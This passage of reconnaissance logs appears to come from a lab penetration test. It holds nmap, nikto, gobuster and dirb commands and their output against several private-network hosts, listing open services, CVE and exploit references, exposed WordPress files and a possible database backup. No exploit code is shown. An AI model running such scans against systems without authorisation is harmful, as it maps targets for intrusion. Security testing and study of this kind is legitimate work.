|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
3306/tcp open http nginx 1.18.0 (Ubuntu)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /database.sql: Possible database backup
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.securityfocus.com/bid/49303
| https://www.tenable.com/plugins/nessus/55976
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_rsa-vuln-roca: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: ERROR: Script execution failed (use -d to debug)
|_ssl-dh-params: ERROR: Script execution failed (use -d to debug)
|_ssl-heartbleed: ERROR: Script execution failed (use -d to debug)
|_ssl-poodle: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:igor_sysoev:nginx:1.18.0:
| OSV:CVE-2022-41742 0.0 https://vulners.com/osv/OSV:CVE-2022-41742
| OSV:CVE-2022-41741 0.0 https://vulners.com/osv/OSV:CVE-2022-41741
|_ OSV:CVE-2021-3618 0.0 https://vulners.com/osv/OSV:CVE-2021-3618
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.18 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.72 -oA machines/192_168_110_72/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:31 CET
Nmap scan report for 192.168.110.72
Host is up (0.00074s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.55 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.72 -oA machines/192_168_110_72/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:15 CET
Nmap scan report for 192.168.110.72
Host is up (0.00066s latency).
Not shown: 936 closed ports, 63 open|filtered ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/20%Time=637A645A%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 935.78 seconds
Wordpress 6.1.1
nikto -h 192.168.110.72
---------------------------------------------------------------------------
+ Target IP: 192.168.110.72
+ Target Hostname: 192.168.110.72
+ Target Port: 80
+ Start Time: 2022-12-10 09:22:10 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.110.72/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a differnt fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7919 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-12-10 09:30:59 (GMT1) (529 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.72/:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.72/:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/10 10:07:28 Starting gobuster in directory enumeration mode
===============================================================
/atom (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/atom/]
/feed (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/h (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/H (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/hello (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/]
/rdf (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/rdf/]
/rss (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/S (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/s (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sam (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sample (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sa (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
===============================================================
2022/12/10 10:10:38 Finished
===============================================================
dirb http://192.168.110.72:80 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 10 09:45:22 2022
URL_BASE: http://192.168.110.72:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.72:80/ ----
+ http://192.168.110.72:80/index.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/readme.html (CODE:200|SIZE:7389)
+ http://192.168.110.72:80/wp-app.php (CODE:403|SIZE:0)
+ http://192.168.110.72:80/wp-atom.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-commentsrss2.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-config.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-cron.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-feed.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-links-opml.php (CODE:200|SIZE:236)
+ http://192.168.110.72:80/wp-load.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-login.php (CODE:200|SIZE:5396)
+ http://192.168.110.72:80/wp-mail.php (CODE:403|SIZE:2593)
+ http://192.168.110.72:80/wp-rdf.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-register.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-rss.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-rss2.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-settings.php (CODE:500|SIZE:0)
+ http://192.168.110.72:80/wp-signup.php (CODE:302|SIZE:0)
+ http://192.168.110.72:80/xmlrpc.php (CODE:405|SIZE:42)
-----------------
END_TIME: Sat Dec 10 09:51:36 2022
DOWNLOADED: 9224 - FOUND: 19
sudo nmap 192.168.110.72 -sV -oA 192_168_110_72/enumeration/nmap/ftp --script "safe and ftp-*" -sU -T5 -p69
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:32 CET
Nmap scan report for 192.168.110.72
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
69/udp open tftp?
| fingerprint-strings:
| AFSVersionRequest, Citrix, DNS-SD, DNSStatusRequest, DNSVersionBindReq, Kerberos, NBTStat, NTPRequest, NetMotionMobility, RPCCheck, SIPOptions, SNMPv1public, SNMPv3GetRequest, Sqlping, sybaseanywhere, xdmcp:
| Welcome to UDP backup server by haxx0r v0.1, say help for help.
| Help:
|_ You can download your backup by saying backup followed by your password.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.08 seconds
sudo nmap 192.168.110.73 -sV -oA 192_168_110_73/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:07 CET
Nmap scan report for 192.168.110.73
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.110.73
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.110.73:80/
| Form id: searchform
| Form action: /
|
| Path: http://192.168.110.73:80/
| Form id: searchform
|_ Form action: /
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-wnr1000-creds: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| SSV:60427 6.9 https://vulners.com/seebug/SSV:60427 *EXPLOIT*
| SSV:60386 6.9 https://vulners.com/seebug/SSV:60386 *EXPLOIT*
| SSV:60069 6.9 https://vulners.com/seebug/SSV:60069 *EXPLOIT*
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| PACKETSTORM:127546 6.8 https://vulners.com/packetstorm/PACKETSTORM:127546 *EXPLOIT*
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| 1337DAY-ID-22451 6.8 https://vulners.com/zdt/1337DAY-ID-22451 *EXPLOIT*
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT*
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT*
| SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT*
| SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT*
| SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT*
| SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT*
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455
|_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 528.01 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.73 -oA machines/192_168_110_73/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:31 CET
Nmap scan report for 192.168.110.73
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.13 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.73 -oA machines/192_168_110_73/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:15 CET
Warning: 192.168.110.73 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.73
Host is up (0.00077s latency).
All 1000 scanned ports on 192.168.110.73 are closed (972) or open|filtered (28)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1050.50 seconds
WordPress 2.8
Apache 2.2.22
nikto -h 192.168.110.73
---------------------------------------------------------------------------
+ Target IP: 192.168.110.73
+ Target Hostname: 192.168.110.73
+ Target Port: 80
+ Start Time: 2022-12-11 06:58:45 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /readme.html: This WordPress file reveals the installed version.
+ /: A Wordpress installation was found.
+ /wp-login.php: Wordpress login found
+ /wp-content/plugins/gravityforms/change_log.txt: Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849
+ 7927 requests: 12 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-12-11 07:00:48 (GMT1) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.73/:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.73/:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:14:24 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2022/12/11 07:14:27 Finished
===============================================================
dirb http://192.168.110.73:80 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:00:53 2022
URL_BASE: http://192.168.110.73:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.73:80/ ----
+ http://192.168.110.73:80/index.php (CODE:200|SIZE:6628)
+ http://192.168.110.73:80/readme.html (CODE:200|SIZE:9225)
+ http://192.168.110.73:80/wp-login.php (CODE:200|SIZE:2024)
+ http://192.168.110.73:80/xmlrpc.php (CODE:200|SIZE:42)
-----------------
END_TIME: Sun Dec 11 07:02:31 2022
DOWNLOADED: 9224 - FOUND: 4
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.80 -oA machines/192_168_110_80/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:32 CET
Nmap scan report for 192.168.110.80
Host is up (0.00059s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10
Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.4 (92%), Linux 2.6.32 or 3.10 (92%), Linux 5.0 - 5.3 (90%), Linux 5.4 (90%), Linux 4.0 (90%), Linux 2.6.32 (90%), Linux 4.4 (90%), Linux 2.6.32 - 2.6.35 (88%), Linux 2.6.32 - 2.6.39 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.54 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 -Pn 192.168.110.80 -oA machines/192_168_110_80/enumeration/nmap/nmap_udp_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:20 CET
Nmap scan report for 192.168.110.80
Host is up.
All 1000 scanned ports on 192.168.110.80 are open|filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
